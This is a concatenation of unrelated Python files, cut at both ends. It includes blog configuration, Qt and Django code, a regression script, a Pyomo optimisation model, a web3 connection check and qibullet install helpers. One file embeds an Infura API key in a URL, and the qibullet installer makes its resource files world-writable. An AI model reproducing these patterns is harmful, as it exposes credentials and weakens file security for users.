Pelican and modified Bootstrap 3 theme" # discus site name DISQUS_SITENAME = 'tutysarablog' # google analytics GOOGLE_ANALYTICS = 'UA-34510369-1' # Filename Metadata: YYYY-MM-DD-the-rest-before-the-dot-is-the-slug.md, for example FILENAME_METADATA = '(?P\d{4}-\d{2}-\d{2})-(?P.*)' ARTICLE_URL = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/' ARTICLE_SAVE_AS = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html' PAGE_URL ='pages/{slug}/index.html' PAGE_SAVE_AS = 'pages/{slug}/index.html' # Copy some files over... FILES_TO_COPY = (("extras/favicon.ico", "favicon.ico"), ("extras/CNAME", "CNAME"),) # Theme support THEME = "/Users/tutysara/src/myprojects/pelican-bootstrap3-tutysara" ADDTHIS_PROFILE = "ra-52530224602b734f" BOOTSTRAP_THEME = "journal" USE_OPEN_GRAPH= False michaelbadcrumble/meson-ui10-100 #!/usr/bin/env python3 # # author : .   # contact: > # license: Apache 2.0 :http://www.apache.org/licenses/LICENSE-2.0 # # copyright 2020 The Meson-UI development team # from PyQt5.QtCore import pyqtSlot from PyQt5.QtWidgets import QDialog from ..mesonuilib.coredata import MesonUiInstallCache from ..mesonuilib.coredata import default_install from ..models.appmodel import MainModel from ..mesonuitheme import MesonUiTheme import typing as T from ..ui.activity_install import Ui_Activity_Dist_Dialog class InstallActivity(QDialog, Ui_Activity_Dist_Dialog): def __init__(self, model: MainModel = None): super(self.__class__, self).__init__() self.setupUi(self) self.setStyleSheet(MesonUiTheme().set_theme()) self.setFixedSize(740, 421) self._model: MainModel = model self.on_activity_start() self.show() @pyqtSlot() def on_activity_start(self): ''' This method is the starting point of this Meson-UI and is called after the app is initlzied. ''' self._cache: MesonUiInstallCache = MesonUiInstallCache() self.control_push_do_update.clicked.connect(lambda: self.exec_do_update()) self.control_push_do_install.clicked.connect(lambda: self.exec_do_dist()) self.control_push_no_install.clicked.connect(lambda: self.exec_no_dist()) self._cache.init_cache() self._cache_default() @pyqtSlot() def exec_do_dist(self): ''' this method will perform the "meson install" action and pass all options with the set whatever the user would like ''' meson_args: list = list() self._cache_update() self._cache_parser(meson_args=meson_args) self._cache_sender(meson_args=meson_args) self.close() @pyqtSlot() def exec_do_update(self): ''' this method just calls _cache_update to refresh current settings values in configure cache object ''' self._cache_update() @pyqtSlot() def exec_no_dist(self): self.close() def _cache_sender(self, meson_args: list) -> None: ''' this method will send the set to are Meson wrapper object ''' self._meson.install(meson_args) def _cache_parser(self, meson_args: list) -> None: ''' this method will parse the given cache configuration via extract from cache objects internal set value and add to local 'meson_args' setup ''' # # here we need to always get a fresh copy of # the current configuration data from are core # cache data so we don’t pass old data. cache: T.Dict = self._cache.get_cache() # # here we add Meson install config values from # are cache object. for conf in cache: meson_args.extend([f'{conf}={cache[conf]}']) def _cache_update(self) -> None: ''' this method will update all supported Meson build options to whatever the user sets the values to. 
''' self._cache.configure('formats', self.combo_formats.currentText()) self._cache.configure('include-subprojects', self.combo_include_subprojects.currentText()) self._cache.configure('quiet', self.combo_include_subprojects.currentText()) def _cache_default(self) -> None: ''' here we set all supported options to the first value from are default cache settings dict objects. ''' self.combo_no_rebuild.addItems(default_install['on-rebuild']) self.combo_only_changed.addItems(default_install['only-changed']) self.combo_quiet.addItems(default_install['quiet']) # Generated by Django 3.1.6 on 2021-08-26 19:52 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('jobs', '0017_merge_20210826_1952'), ] operations = [ migrations.DeleteModel( name='HistoricalJob', ), ] projdir/app/migrations/0020_auto_20160501_2317.py # -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-05-01 17:47 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('app', '0019_pinghostprojectmodel'), ] operations = [ migrations.RenameField( model_name='pinghostprojectmodel', old_name='hosted_event', new_name='hosted_project', ), ] import pandas as pd from sklearn.preprocessing import LabelEncoder from sklearn.model_selection import cross_val_score from sklearn.linear_model import LinearRegression from sklearn.ensemble import RandomForestRegressor from sklearn.ensemble import GradientBoostingRegressor #from sklearn.preprocessing import LabelEncoder ## Loading data and preprocessing data = pd.read_csv('../datasets/merged.csv') train_data=data.iloc[:,0:10] data["Individual_Rate"] = (data["Individual_Rate"]-data["Individual_Rate"].min())/(data["Individual_Rate"].max()-data["Individual_Rate"].min()) Y=data.iloc[:,10] #test_data = pd.read_csv('../datasets/merged.csv') features=['Ins_Age','BMI','Individual_Rate'] ##Linear Regression LinReg_model = LinearRegression() LinReg_model.fit(train_data[features], Y) linReg_score = cross_val_score(LinReg_model, train_data[features], Y, cv=10,scoring='r2').mean() print("R2 score using Linear Regression is ",linReg_score*100) print("Linear reg coef",LinReg_model.coef_) ##Random Forest Regressor ## ##RanForest_model = RandomForestRegressor( random_state=0) ##RanForest_model.fit(train_data[features], Y) ##ranForest_score = cross_val_score(RanForest_model, train_data[features], Y, cv=10,scoring='r2').mean() ##print("R2 score using Random Forest Regression is ",ranForest_score*100) ##Gradient Boosting Regressor GradBoost_model = GradientBoostingRegressor(max_depth=3, random_state=0,learning_rate=0.1,n_estimators=200) GradBoost_model.fit(train_data[features], Y) GradBoost_model.apply(train_data[features]) gradBoost_score = cross_val_score(GradBoost_model, train_data[features], Y, cv=10,scoring='r2').mean() print("Feature Importance ",GradBoost_model.feature_importances_) print("R2 score using Gradient Boosting Regressor is ",gradBoost_score*100) tests/examples/minlplib/graphpart_3g-0333-0333.py # MINLP written by GAMS Convert at 04/21/18 13:52:22 # # Equation counts # Total E G L N X C B # 28 28 0 0 0 0 0 0 # # Variable counts # x b i s1s s2s sc si # Total cont binary integer sos1 sos2 scont sint # 82 1 81 0 0 0 0 0 # FX 0 0 0 0 0 0 0 0 # # Nonzero counts # Total const NL DLL # 163 82 81 0 # # Reformulation has removed 1 variable and 1 equation from pyomo.environ import * model = m = ConcreteModel() m.b1 = Var(within=Binary,bounds=(0,1),initialize=0) m.b2 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b3 = Var(within=Binary,bounds=(0,1),initialize=0) m.b4 = Var(within=Binary,bounds=(0,1),initialize=0) m.b5 = Var(within=Binary,bounds=(0,1),initialize=0) m.b6 = Var(within=Binary,bounds=(0,1),initialize=0) m.b7 = Var(within=Binary,bounds=(0,1),initialize=0) m.b8 = Var(within=Binary,bounds=(0,1),initialize=0) m.b9 = Var(within=Binary,bounds=(0,1),initialize=0) m.b10 = Var(within=Binary,bounds=(0,1),initialize=0) m.b11 = Var(within=Binary,bounds=(0,1),initialize=0) m.b12 = Var(within=Binary,bounds=(0,1),initialize=0) m.b13 = Var(within=Binary,bounds=(0,1),initialize=0) m.b14 = Var(within=Binary,bounds=(0,1),initialize=0) m.b15 = Var(within=Binary,bounds=(0,1),initialize=0) m.b16 = Var(within=Binary,bounds=(0,1),initialize=0) m.b17 = Var(within=Binary,bounds=(0,1),initialize=0) m.b18 = Var(within=Binary,bounds=(0,1),initialize=0) m.b19 = Var(within=Binary,bounds=(0,1),initialize=0) m.b20 = Var(within=Binary,bounds=(0,1),initialize=0) m.b21 = Var(within=Binary,bounds=(0,1),initialize=0) m.b22 = Var(within=Binary,bounds=(0,1),initialize=0) m.b23 = Var(within=Binary,bounds=(0,1),initialize=0) m.b24 = Var(within=Binary,bounds=(0,1),initialize=0) m.b25 = Var(within=Binary,bounds=(0,1),initialize=0) m.b26 = Var(within=Binary,bounds=(0,1),initialize=0) m.b27 = Var(within=Binary,bounds=(0,1),initialize=0) m.b28 = Var(within=Binary,bounds=(0,1),initialize=0) m.b29 = Var(within=Binary,bounds=(0,1),initialize=0) m.b30 = Var(within=Binary,bounds=(0,1),initialize=0) m.b31 = Var(within=Binary,bounds=(0,1),initialize=0) m.b32 = Var(within=Binary,bounds=(0,1),initialize=0) m.b33 = Var(within=Binary,bounds=(0,1),initialize=0) m.b34 = Var(within=Binary,bounds=(0,1),initialize=0) m.b35 = Var(within=Binary,bounds=(0,1),initialize=0) m.b36 = Var(within=Binary,bounds=(0,1),initialize=0) m.b37 = Var(within=Binary,bounds=(0,1),initialize=0) m.b38 = Var(within=Binary,bounds=(0,1),initialize=0) m.b39 = Var(within=Binary,bounds=(0,1),initialize=0) m.b40 = Var(within=Binary,bounds=(0,1),initialize=0) m.b41 = Var(within=Binary,bounds=(0,1),initialize=0) m.b42 = Var(within=Binary,bounds=(0,1),initialize=0) m.b43 = Var(within=Binary,bounds=(0,1),initialize=0) m.b44 = Var(within=Binary,bounds=(0,1),initialize=0) m.b45 = Var(within=Binary,bounds=(0,1),initialize=0) m.b46 = Var(within=Binary,bounds=(0,1),initialize=0) m.b47 = Var(within=Binary,bounds=(0,1),initialize=0) m.b48 = Var(within=Binary,bounds=(0,1),initialize=0) m.b49 = Var(within=Binary,bounds=(0,1),initialize=0) m.b50 = Var(within=Binary,bounds=(0,1),initialize=0) m.b51 = Var(within=Binary,bounds=(0,1),initialize=0) m.b52 = Var(within=Binary,bounds=(0,1),initialize=0) m.b53 = Var(within=Binary,bounds=(0,1),initialize=0) m.b54 = Var(within=Binary,bounds=(0,1),initialize=0) m.b55 = Var(within=Binary,bounds=(0,1),initialize=0) m.b56 = Var(within=Binary,bounds=(0,1),initialize=0) m.b57 = Var(within=Binary,bounds=(0,1),initialize=0) m.b58 = Var(within=Binary,bounds=(0,1),initialize=0) m.b59 = Var(within=Binary,bounds=(0,1),initialize=0) m.b60 = Var(within=Binary,bounds=(0,1),initialize=0) m.b61 = Var(within=Binary,bounds=(0,1),initialize=0) m.b62 = Var(within=Binary,bounds=(0,1),initialize=0) m.b63 = Var(within=Binary,bounds=(0,1),initialize=0) m.b64 = Var(within=Binary,bounds=(0,1),initialize=0) m.b65 = Var(within=Binary,bounds=(0,1),initialize=0) m.b66 = Var(within=Binary,bounds=(0,1),initialize=0) m.b67 = Var(within=Binary,bounds=(0,1),initialize=0) m.b68 = Var(within=Binary,bounds=(0,1),initialize=0) m.b69 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b70 = Var(within=Binary,bounds=(0,1),initialize=0) m.b71 = Var(within=Binary,bounds=(0,1),initialize=0) m.b72 = Var(within=Binary,bounds=(0,1),initialize=0) m.b73 = Var(within=Binary,bounds=(0,1),initialize=0) m.b74 = Var(within=Binary,bounds=(0,1),initialize=0) m.b75 = Var(within=Binary,bounds=(0,1),initialize=0) m.b76 = Var(within=Binary,bounds=(0,1),initialize=0) m.b77 = Var(within=Binary,bounds=(0,1),initialize=0) m.b78 = Var(within=Binary,bounds=(0,1),initialize=0) m.b79 = Var(within=Binary,bounds=(0,1),initialize=0) m.b80 = Var(within=Binary,bounds=(0,1),initialize=0) m.b81 = Var(within=Binary,bounds=(0,1),initialize=0) m.obj = Objective(expr=129255*m.b1*m.b7 - 2042*m.b1*m.b4 - 8522*m.b1*m.b10 + 36910*m.b1*m.b19 - 145869*m.b1*m.b28 + 127657*m.b1*m.b55 - 2042*m.b2*m.b5 + 129255*m.b2*m.b8 - 8522*m.b2*m.b11 + 36910*m.b2*m.b20 - 145869*m.b2*m.b29 + 127657*m.b2*m.b56 - 2042*m.b3*m.b6 + 129255*m.b3*m.b9 - 8522*m.b3*m.b12 + 36910*m.b3*m.b21 - 145869*m.b3*m.b30 + 127657*m.b3*m.b57 - 33798*m.b4*m.b7 - 39758*m.b4*m.b13 + 11107*m.b4*m.b22 + 15677*m.b4*m.b31 + 73973*m.b4*m.b58 - 33798*m.b5*m.b8 - 39758*m.b5*m.b14 + 11107*m.b5*m.b23 + 15677*m.b5*m.b32 + 73973*m.b5*m.b59 - 33798*m.b6*m.b9 - 39758*m.b6*m.b15 + 11107*m.b6*m.b24 + 15677*m.b6*m.b33 + 73973*m.b6*m.b60 - 107376*m.b7*m.b16 + 22779*m.b7*m.b25 - 25900*m.b7*m.b34 + 148330*m.b7*m.b61 - 107376*m.b8*m.b17 + 22779*m.b8*m.b26 - 25900*m.b8*m.b35 + 148330*m.b8*m.b62 - 107376*m.b9*m.b18 + 22779*m.b9*m.b27 - 25900*m.b9*m.b36 + 148330*m.b9*m.b63 + 91287*m.b10*m.b13 + 124870*m.b10*m.b16 + 162003*m.b10*m.b19 - 11373*m.b10*m.b37 - 47393*m.b10* m.b64 + 91287*m.b11*m.b14 + 124870*m.b11*m.b17 + 162003*m.b11*m.b20 - 11373*m.b11*m.b38 - 47393* m.b11*m.b65 + 91287*m.b12*m.b15 + 124870*m.b12*m.b18 + 162003*m.b12*m.b21 - 11373*m.b12*m.b39 - 47393*m.b12*m.b66 + 124357*m.b13*m.b16 + 13532*m.b13*m.b22 + 4677*m.b13*m.b40 - 1151*m.b13*m.b67 + 124357*m.b14*m.b17 + 13532*m.b14*m.b23 + 4677*m.b14*m.b41 - 1151*m.b14*m.b68 + 124357*m.b15* m.b18 + 13532*m.b15*m.b24 + 4677*m.b15*m.b42 - 1151*m.b15*m.b69 + 184*m.b16*m.b25 + 47897*m.b16* m.b43 + 44236*m.b16*m.b70 + 184*m.b17*m.b26 + 47897*m.b17*m.b44 + 44236*m.b17*m.b71 + 184*m.b18* m.b27 + 47897*m.b18*m.b45 + 44236*m.b18*m.b72 + 244323*m.b19*m.b22 + 86471*m.b19*m.b25 + 77346* m.b19*m.b46 + 79541*m.b19*m.b73 + 244323*m.b20*m.b23 + 86471*m.b20*m.b26 + 77346*m.b20*m.b47 + 79541*m.b20*m.b74 + 244323*m.b21*m.b24 + 86471*m.b21*m.b27 + 77346*m.b21*m.b48 + 79541*m.b21* m.b75 - 253603*m.b22*m.b25 - 64607*m.b22*m.b49 - 15251*m.b22*m.b76 - 253603*m.b23*m.b26 - 64607* m.b23*m.b50 - 15251*m.b23*m.b77 - 253603*m.b24*m.b27 - 64607*m.b24*m.b51 - 15251*m.b24*m.b78 + 161607*m.b25*m.b52 - 38842*m.b25*m.b79 + 161607*m.b26*m.b53 - 38842*m.b26*m.b80 + 161607*m.b27* m.b54 - 38842*m.b27*m.b81 - 141201*m.b28*m.b31 + 98698*m.b28*m.b34 + 126297*m.b28*m.b37 + 55703* m.b28*m.b46 - 109445*m.b28*m.b55 - 141201*m.b29*m.b32 + 98698*m.b29*m.b35 + 126297*m.b29*m.b38 + 55703*m.b29*m.b47 - 109445*m.b29*m.b56 - 141201*m.b30*m.b33 + 98698*m.b30*m.b36 + 126297*m.b30* m.b39 + 55703*m.b30*m.b48 - 109445*m.b30*m.b57 - 133217*m.b31*m.b34 - 85164*m.b31*m.b40 + 83576* m.b31*m.b49 + 109539*m.b31*m.b58 - 133217*m.b32*m.b35 - 85164*m.b32*m.b41 + 83576*m.b32*m.b50 + 109539*m.b32*m.b59 - 133217*m.b33*m.b36 - 85164*m.b33*m.b42 + 83576*m.b33*m.b51 + 109539*m.b33* m.b60 + 16583*m.b34*m.b43 + 79672*m.b34*m.b52 - 30705*m.b34*m.b61 + 16583*m.b35*m.b44 + 79672* m.b35*m.b53 - 30705*m.b35*m.b62 + 16583*m.b36*m.b45 + 79672*m.b36*m.b54 - 
30705*m.b36*m.b63 - 23313*m.b37*m.b40 + 89988*m.b37*m.b43 + 230817*m.b37*m.b46 - 45147*m.b37*m.b64 - 23313*m.b38* m.b41 + 89988*m.b38*m.b44 + 230817*m.b38*m.b47 - 45147*m.b38*m.b65 - 23313*m.b39*m.b42 + 89988* m.b39*m.b45 + 230817*m.b39*m.b48 - 45147*m.b39*m.b66 + 64517*m.b40*m.b43 + 144765*m.b40*m.b49 + 24227*m.b40*m.b67 + 64517*m.b41*m.b44 + 144765*m.b41*m.b50 + 24227*m.b41*m.b68 + 64517*m.b42* m.b45 + 144765*m.b42*m.b51 + 24227*m.b42*m.b69 - 72744*m.b43*m.b52 - 37029*m.b43*m.b70 - 72744* m.b44*m.b53 - 37029*m.b44*m.b71 - 72744*m.b45*m.b54 - 37029*m.b45*m.b72 + 62016*m.b46*m.b49 + 4269*m.b46*m.b52 - 55976*m.b46*m.b73 + 62016*m.b47*m.b50 + 4269*m.b47*m.b53 - 55976*m.b47*m.b74 + 62016*m.b48*m.b51 + 4269*m.b48*m.b54 - 55976*m.b48*m.b75 - 18978*m.b49*m.b52 + 93391*m.b49* m.b76 - 18978*m.b50*m.b53 + 93391*m.b50*m.b77 - 18978*m.b51*m.b54 + 93391*m.b51*m.b78 + 19705* m.b52*m.b79 + 19705*m.b53*m.b80 + 19705*m.b54*m.b81 - 209910*m.b55*m.b58 - 212130*m.b55*m.b61 + 34970*m.b55*m.b64 - 105842*m.b55*m.b73 - 209910*m.b56*m.b59 - 212130*m.b56*m.b62 + 34970*m.b56* m.b65 - 105842*m.b56*m.b74 - 209910*m.b57*m.b60 - 212130*m.b57*m.b63 + 34970*m.b57*m.b66 - 105842 *m.b57*m.b75 - 636*m.b58*m.b61 + 22984*m.b58*m.b67 - 194676*m.b58*m.b76 - 636*m.b59*m.b62 + 22984 *m.b59*m.b68 - 194676*m.b59*m.b77 - 636*m.b60*m.b63 + 22984*m.b60*m.b69 - 194676*m.b60*m.b78 + 18051*m.b61*m.b70 + 14026*m.b61*m.b79 + 18051*m.b62*m.b71 + 14026*m.b62*m.b80 + 18051*m.b63*m.b72 + 14026*m.b63*m.b81 + 37051*m.b64*m.b67 - 14833*m.b64*m.b70 - 13122*m.b64*m.b73 + 37051*m.b65* m.b68 - 14833*m.b65*m.b71 - 13122*m.b65*m.b74 + 37051*m.b66*m.b69 - 14833*m.b66*m.b72 - 13122* m.b66*m.b75 - 66834*m.b67*m.b70 + 51800*m.b67*m.b76 - 66834*m.b68*m.b71 + 51800*m.b68*m.b77 - 66834*m.b69*m.b72 + 51800*m.b69*m.b78 + 108829*m.b70*m.b79 + 108829*m.b71*m.b80 + 108829*m.b72* m.b81 + 62586*m.b73*m.b76 - 78649*m.b73*m.b79 + 62586*m.b74*m.b77 - 78649*m.b74*m.b80 + 62586* m.b75*m.b78 - 78649*m.b75*m.b81 + 11036*m.b76*m.b79 + 11036*m.b77*m.b80 + 11036*m.b78*m.b81 , sense=minimize) m.c1 = Constraint(expr= m.b1 + m.b2 + m.b3 == 1) m.c2 = Constraint(expr= m.b4 + m.b5 + m.b6 == 1) m.c3 = Constraint(expr= m.b7 + m.b8 + m.b9 == 1) m.c4 = Constraint(expr= m.b10 + m.b11 + m.b12 == 1) m.c5 = Constraint(expr= m.b13 + m.b14 + m.b15 == 1) m.c6 = Constraint(expr= m.b16 + m.b17 + m.b18 == 1) m.c7 = Constraint(expr= m.b19 + m.b20 + m.b21 == 1) m.c8 = Constraint(expr= m.b22 + m.b23 + m.b24 == 1) m.c9 = Constraint(expr= m.b25 + m.b26 + m.b27 == 1) m.c10 = Constraint(expr= m.b28 + m.b29 + m.b30 == 1) m.c11 = Constraint(expr= m.b31 + m.b32 + m.b33 == 1) m.c12 = Constraint(expr= m.b34 + m.b35 + m.b36 == 1) m.c13 = Constraint(expr= m.b37 + m.b38 + m.b39 == 1) m.c14 = Constraint(expr= m.b40 + m.b41 + m.b42 == 1) m.c15 = Constraint(expr= m.b43 + m.b44 + m.b45 == 1) m.c16 = Constraint(expr= m.b46 + m.b47 + m.b48 == 1) m.c17 = Constraint(expr= m.b49 + m.b50 + m.b51 == 1) m.c18 = Constraint(expr= m.b52 + m.b53 + m.b54 == 1) m.c19 = Constraint(expr= m.b55 + m.b56 + m.b57 == 1) m.c20 = Constraint(expr= m.b58 + m.b59 + m.b60 == 1) m.c21 = Constraint(expr= m.b61 + m.b62 + m.b63 == 1) m.c22 = Constraint(expr= m.b64 + m.b65 + m.b66 == 1) m.c23 = Constraint(expr= m.b67 + m.b68 + m.b69 == 1) m.c24 = Constraint(expr= m.b70 + m.b71 + m.b72 == 1) m.c25 = Constraint(expr= m.b73 + m.b74 + m.b75 == 1) m.c26 = Constraint(expr= m.b76 + m.b77 + m.b78 == 1) m.c27 = Constraint(expr= m.b79 + m.b80 + m.b81 == 1) from web3 import Web3 import ja_language as ja_lan import pandas as pd if __name__ == "__main__": # 
Inital JA Language Agent ja_lan = ja_lan.language_translator() try: ja_lan_df = pd.read_pickle('ja_lan_env.pkl') apply_lan = ja_lan_df['ja_lan'][0] ja_lan.set_language_code(apply_lan) print(ja_lan.print("[INFO]: Your apply language is {%s}" % apply_lan)) except: print("[INFO]: No ja_lan_env.pkl found !") print("Set language as default 'English' ") # Connected avec infura node-services infura_url = "https://mainnet.infura.io/v3/912414023e2c4a88864de7614e5d3ee4" web3 = Web3(Web3.HTTPProvider(infura_url)) # Verifier connection print(ja_lan.print("Check the web3 is conneced or not "),web3.isConnected() ) # Checked the blockNumber print(ja_lan.print("Check the "), "blockNumber", web3.eth.blockNumber) import datetime class Template: ARGS_NUM = 1 def __init__(self): time = datetime.datetime.today() self.save_time = time.strftime('%H:%M:%S') self.save_date = time.strftime('%d.%m.%Y') self.edit_time = self.save_time self.edit_date = self.save_date def export(self): return self.__dict__ def update(self, data): if isinstance(data, dict): for feature, value in data.items(): self.__setattr__(feature, value) elif isinstance(data, (list, tuple)): for feature, value in zip(list(self.__dict__.keys())[:self.ARGS_NUM], data): self.__setattr__(feature, value) self.update_timedata() def update_timedata(self): time = datetime.datetime.today() self.edit_time = time.strftime('%H:%M:%S') self.edit_date = time.strftime('%d.%m.%Y') qibullet/tools.py #!/usr/bin/env python # coding: utf-8 import os import sys import stat import math import glob import shutil import platform import pybullet # Version tag corresponding to the latest version of the additional qibullet # ressources RESOURCES_VERSION = "1.4.3" def getDistance(point_a, point_b): [x1, y1, z1] = point_a [x2, y2, z2] = point_b return int(math.sqrt((x2 - x1)**2 + (y2 - y1)**2 + (z2 - z1)**2) * 100)\ / 100.0 def getOrientation(theta_a, theta_b): return theta_b[-1] - theta_a[-1] def computeVelocity(acc, vel_min, vel_max, dist_traveled, dist_remained): distance_acc = (vel_max * vel_max) / (2 * acc) if dist_traveled < distance_acc: vel_computed = (vel_max - vel_min) *\ dist_traveled / distance_acc + vel_min if dist_traveled >= distance_acc: vel_computed = vel_max if dist_remained < distance_acc: vel_computed = (vel_max - vel_min) *\ dist_remained / distance_acc + vel_min return vel_computed def _get_resources_root_folder(): # pragma: no cover """ Returns the path to the resources' root folder (.qibullet folder in the user's home). The path will be returned even if the installation folder does not yet exist """ if platform.system() == "Windows": return os.path.expanduser("~") + "\\.qibullet" else: return os.path.expanduser("~") + "/.qibullet" def _get_resources_folder(): # pragma: no cover """ Returns the path to the resources folder specific to the current qibullet version (.qibullet/resources_version folder in the user's home). The path will be returned even if the installation folder does not yet exists """ if platform.system() == "Windows": return _get_resources_root_folder() + "\\" + RESOURCES_VERSION else: return _get_resources_root_folder() + "/" + RESOURCES_VERSION def _install_resources(agreement=False): # pragma: no cover """ Extracts the robot meshes and install the urdfs and the meshes, using the provided installers. 
The resources will be installed in the user's home folder (under the .qibullet folder) """ # If the install folder already exists, remove it if not _uninstall_resources(): print( "Cannot install the ressources, try to manually remove the " + _get_resources_root_folder() + " folder first.") return resources_folder = _get_resources_folder() # Displaying the qiBullet version corresponding to the extra resources print("\nInstalling resources for qiBullet") # Ask for user feedback before installing everything. try: assert not agreement if sys.version_info > (3, 0): answer = input( "\nThe robot meshes and URDFs will be installed in the " + resources_folder + " folder. You will need to agree to" " the meshes license in order to be able to install them." " Continue the installation (y/n)? ") else: answer = raw_input( "\nThe robot meshes and URDFs will be installed in the " + resources_folder + " folder. You will need to agree to" " the meshes license in order to be able to install them." " Continue the installation (y/n)? ") except AssertionError: answer = "y" if answer.lower() == "y": print( "Installing the meshes and URDFs in the " + resources_folder + " folder...") else: print("The meshes and URDFs won't be installed.") return # Create the resources root folder os.mkdir(_get_resources_root_folder()) # Create the version specific resources folder os.mkdir(resources_folder) # Fetch the correct installer and extract the robot meshes in the install # folder if platform.system() == "Windows": data_folder = os.path.dirname(os.path.realpath(__file__)) +\ "\\robot_data\\" else: data_folder = os.path.dirname(os.path.realpath(__file__)) +\ "/robot_data/" sys.path.insert(0, data_folder + "installers") major = sys.version_info[0] minor = sys.version_info[1] print("Python " + str(major) + "." 
          + str(minor) + " detected")

    if major == 3:
        if minor == 5:
            import meshes_installer_35 as meshes_installer
        elif minor == 6:
            import meshes_installer_36 as meshes_installer
        elif minor == 7:
            import meshes_installer_37 as meshes_installer
        elif minor == 8:
            import meshes_installer_38 as meshes_installer
        elif minor == 9:
            import meshes_installer_39 as meshes_installer
        else:
            print("Incompatible version of Python 3")
            return
    elif major == 2:
        if minor == 7:
            import meshes_installer_27 as meshes_installer
        else:
            print("Incompatible version of Python 2")
            return
    else:
        print("Incompatible Python version")
        return

    if meshes_installer._install_meshes(resources_folder, agreement=agreement):
        print("Resources correctly extracted")
    else:
        print("Could not extract the resources")
        return

    # Install the robot URDFs in the install folder
    print("Installing the robot URDFs...")

    for urdf in glob.glob(data_folder + "*.urdf"):
        shutil.copy2(urdf, resources_folder)

    # Grant writing permissions on the resources
    if platform.system() != "Windows":
        permissions = stat.S_IWOTH | stat.S_IWGRP

        os.chmod(
            _get_resources_root_folder(),
            permissions | os.stat(_get_resources_root_folder()).st_mode)

        for root, folders, files in os.walk(_get_resources_root_folder()):
            for folder in folders:
                folder_path = os.path.join(root, folder)
                os.chmod(
                    folder_path,
                    permissions | os.stat(folder_path).st_mode)

            for ressource_file in files:
                file_path = os.path.join(root, ressource_file)
                os.chmod(file_path, permissions | os.stat(file_path).st_mode)

    print(
        "(To remove the installed resources, use the _uninstall_resources "
        "method of qibullet.tools, or remove the folder manually)")
    print("Installation done, resources in " + resources_folder)
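# Illustrative usage sketch (not part of qibullet itself, so it is left
# commented out here): callers typically pair the install helper above with
# the check defined further below, so that missing meshes and URDFs are
# fetched on first use. Passing agreement=True makes _install_resources skip
# the interactive license prompt, as its implementation shows.
#
#   from qibullet import tools
#
#   if not tools._check_resources_installed():
#       tools._install_resources(agreement=True)
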
def _uninstall_resources():  # pragma: no cover
    """
    Uninstall the robot meshes and the urdfs from the user's home folder
    (removing the .qibullet folder in the user's home).

    Will return True if the .qibullet folder doesn't exist in the user's home
    anymore
    """
    if os.path.exists(_get_resources_root_folder()):
        try:
            shutil.rmtree(_get_resources_root_folder())
        except OSError:
            return False

    return True


def _check_resources_installed():  # pragma: no cover
    """
    Checks if the resources (URDFs and robot meshes) are installed in the
    user's home folder (in the .qibullet folder)

    Returns:
        installed - boolean, True if the meshes are installed, False otherwise
    """
    install_folder = os.path.dirname(os.path.realpath(__file__))

    try:
        assert os.path.exists(_get_resources_root_folder())
    except AssertionError:
        print("\nThe qibullet resources are not yet installed.")
        return False

    try:
        assert os.path.exists(_get_resources_folder())
    except AssertionError:
        print("\nThe qibullet resources are not up to date.")
        return False

    try:
        if platform.system() == "Windows":
            assert os.path.exists(_get_resources_folder() + "\\nao.urdf")
            assert os.path.exists(_get_resources_folder() + "\\romeo.urdf")
            assert os.path.exists(_get_resources_folder() + "\\pepper.urdf")
            assert os.path.exists(_get_resources_folder() + "\\meshes")
        else:
            assert os.path.exists(_get_resources_folder() + "/nao.urdf")
            assert os.path.exists(_get_resources_folder() + "/romeo.urdf")
            assert os.path.exists(_get_resources_folder() + "/pepper.urdf")
            assert os.path.exists(_get_resources_folder() + "/meshes")
        return True
    except AssertionError:
        print("\nThe qibullet resources are up to date but seem incomplete.")
        return False

import numpy as np

from ModularSlug import Aplysia, MyNeuralModel, MyMuscleModel

n_steps = 10

params = []
x0 = [0, 0, 0, 0]  # corresponds to MyNeuralModel.neural_outputs_dtype
neural_model = MyNeuralModel(params, n_steps, x0)

params = []
x0 = [0, 0, 0]  # corresponds to MyMuscleModel.muscle_outputs_dtype
muscle_model = MyMuscleModel(params, n_steps, x0)

aplysia = Aplysia(n_steps, neural_model, muscle_model)
aplysia.run()
aplysia.summarize()

print()
print('Final value of B3:', aplysia.neural_outputs['B3'])
print('Final value of I2:', aplysia.muscle_outputs['I2'])

"""Setup script for rarfile.
""" import re from setuptools import setup vrx = r"""^__version__ *= *['"]([^'"]+)['"]""" src = open("rarfile.py").read() ver = re.search(vrx, src, re.M).group(1) ldesc = open("README.rst").read().strip() sdesc = ldesc.split('\n')[0].split(' - ')[1].strip() setup( name="rarfile", version=ver, description=sdesc, long_description=ldesc, author="", license="ISC", author_email="", url="https://github.com/markokr/rarfile", py_modules=['rarfile'], keywords=['rar', 'unrar', 'archive'], classifiers=[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: ISC License (ISCL)", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Topic :: Software Development :: Libraries :: Python Modules", "Topic :: System :: Archiving :: Compression", ] ) from kopper.kopper import Kopper from kopper.constants.stations import STATIONS from kopper.constants.train_type import TRAIN_TYPE from models.dao.aps.ApSchedulerEvent import ApSchedulerEvent from models.dao.aps.ApSchedulerJobEvent import ApSchedulerJobEvent from models.dao.aps.ApSchedulerJob import ApSchedulerJob src/button/_action_executor.py import src.button._mqtt_sender as mqtt_sender import src.button._domain as domain from typing import Dict, List import src.irulez.log as log from datetime import datetime import src.output_status.ServiceClient as ServiceClient import src.irulez.util as util logger = log.get_logger('button_processor') class ActionExecutor: """ Contains logic for executing all kinds of actions """ def __init__(self, sender: mqtt_sender.MqttSender, status_service: ServiceClient.StatusServiceClient): self.__sender = sender self.__status_service = status_service def check_condition(self, condition: domain.Condition): if condition is None: return True if condition.condition_type == domain.ConditionType.TIME and isinstance(condition, domain.TimeCondition): return condition.from_time <= datetime.now().time() <= condition.to_time elif condition.condition_type == domain.ConditionType.OUTPUT_PIN and \ isinstance(condition, domain.OutputPinCondition): return condition.status == self.__status_service.get_arduino_pin_status(condition.output_pin.parent, condition.output_pin.number) elif condition.condition_type == domain.ConditionType.LIST and isinstance(condition, domain.ConditionList): for condition in condition.conditions: if condition.operator == domain.Operator.AND: for condition in condition.conditions: if not 